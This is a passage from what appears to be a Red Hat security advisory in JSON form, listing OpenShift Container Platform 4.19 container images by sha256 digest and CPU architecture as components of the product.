"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
